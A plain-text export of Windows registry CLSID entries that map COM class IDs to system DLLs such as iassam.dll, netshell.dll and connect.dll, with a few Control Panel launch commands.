HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iashlpr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096C6-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasads.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096C8-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasads.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096D5-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096DA-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasrad.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096DB-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096DC-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096DD-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096DE-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096DF-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096E0-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096E1-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096E5-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC09894-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasrad.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC09896-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC09897-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC09898-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC09899-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989A-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989C-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989D-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989E-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989F-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasrad.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098A4-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098A5-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098A6-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098A7-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098A8-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098A9-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098AC-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC098AD-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC752F7-9721-49F8-873B-9FECB6215DE3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BD6AECA-AFB0-45B7-BAC4-F292EC0F3F41}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BF0A714-3C18-430b-8B5D-83B1C234D3DB}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BFCACDC-A6A6-4343-9CF6-83A83727367B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6c19be35-7500-11d1-ad94-00c04fd8fdff}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\esscli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C337B26-3E38-4F98-813B-FBA18BAB64F5}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\Windows.Data.Pdf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\activationmanager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C683A5C-32B8-47cd-AC28-4B292414D032}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\umpowmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C752774-29FB-4e50-8BB1-97098425A77C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceMetadataRetrievalClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\main.cpl,-101#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\main.cpl,-100#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\main.cpl,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6c955eca-04ce-4f1e-84fe-d8a526ce3137}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6CED0DAA-4CDE-49C9-BA3A-AE163DC3D7AF} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6CED0DAA-4CDE-49C9-BA3A-AE163DC3D7AF}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D1FBE59-A654-4A0E-8534-4505008DC528}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CoreShellExtFramework.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D3951EB-0B07-4fb8-B703-7C5CEE0DB578} LocalizedString REG_EXPAND_SZ @%SystemRoot%\\system32\\srchadmin.dll,-618 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D3951EB-0B07-4fb8-B703-7C5CEE0DB578}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D4A3650-628D-11D2-AE0F-006097B01411}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D5313C0-8C62-11D1-B2CD-006097DF8C11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D68D1DE-D432-4B0F-923A-091183A9BDA7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D6B3CD8-1278-11D1-9BD4-00C04FB683FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6d6d5c8a-b008-4c62-8f4c-8c11a6a88f25}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D7A4B0E-66D5-4AC3-A7ED-0189E8CF5E77}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipiprt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6d88dda9-359a-46d7-93d5-f1ea8995ab61}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\activationmanager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D8BB3D3-9D87-4a91-AB56-4F30CFFEFE9F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6d8ff8e8-730d-11d4-bf42-00b0d0118b56}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnpcont.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D93C83D-31C1-490E-B5F9-068A80E3D7CB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceDriverRetrievalClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6D99EF93-C3AB-4539-8F2D-BB1BEF21D415}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DA736C9-DCDE-4651-82A8-56E4EF1D8DD7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DAF9757-2E37-11D2-AEC9-00C04FB68820}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\mofd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db29a9b-10d0-4b93-b86a-188fc998eff8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnapps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DC3804B-7212-458D-ADB0-9A07E2AE1FA2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\GPEdit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DD062C7-B6E6-4702-98B0-6E6AB46C877D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22924 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22985 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-166 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6e10d302-789d-4237-9037-6a675bdf6511}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6e18f9c6-a3eb-495a-89b7-956482e19f7a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6e33091c-d2f8-4740-b55e-2e11d1477a2c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shimgvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6E3D2E94-E6D8-4afd-AFDE-ABD26CA88BF5} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\faultrep.dll,-5000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6E582707-CCAF-4333-A9B9-3B4F75C362E0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SyncInfrastructure.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6E5D1F2A-AF9A-419A-9CAF-C5A5C32C3CF8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6e682784-1eca-4cf2-988d-96b6e89e9a4d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6E78DAD9-E187-4D6E-BA63-760256D6F405}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\WMIPSESS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6E7E2EF2-F881-472A-8E32-17CA95710402}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\MDMAppProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6EBFDF36-23A6-4F02-8800-CAB1CFEE43ED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ReportingCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6EC153C1-371E-47E1-A896-2F7F80EB7842}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6EDD6D74-C007-4E75-B76A-E5740995E24C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmlua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6EF07F29-F9B8-4DA4-B59E-13DEA060AD60}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmstplua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f13dd2e-ebee-4dd5-a72e-850b2087f5dd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PhotoMetadataHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovslegacy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6F7C8E8F-DC69-4e3f-BC05-439962A05FD5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC1-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC3-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC4-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC5-3202-11D1-AAD2-00805FC1270E} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC5-3202-11D1-AAD2-00805FC1270E}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC5-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC6-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1201 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC8-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACD1-3202-11D1-AAD2-00805FC1270E} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACD1-3202-11D1-AAD2-00805FC1270E}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACD1-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACD3-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACD4-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACD5-3202-11D1-AAD2-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7013943A-E2EC-11D2-A086-00C04F8EF9B5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7016F8FA-CCDA-11D2-B35C-00105A1F8177}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{703574D6-AA1B-4FBF-A938-9A59C89343FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\pcsvDevice.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7037C8FC-97F7-4AE5-BF2D-5D2660C97878}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\VoiceActivationManager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{70438d09-456a-4a6f-86fe-1c1a3afc699e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{706A79C0-1AC4-4E25-B311-93B643C1E499}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WinMsoIrmProtector.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC01-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC05-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC07-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC13-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC31-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC32-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC33-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC61-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC62-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC71-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC75-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071EC77-663B-4BC1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECA0-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECA3-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECA5-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECA7-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECA8-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECA9-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECAF-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB0-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB3-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB4-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB5-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB6-663B-4BC1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB7-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECB8-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECBF-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll 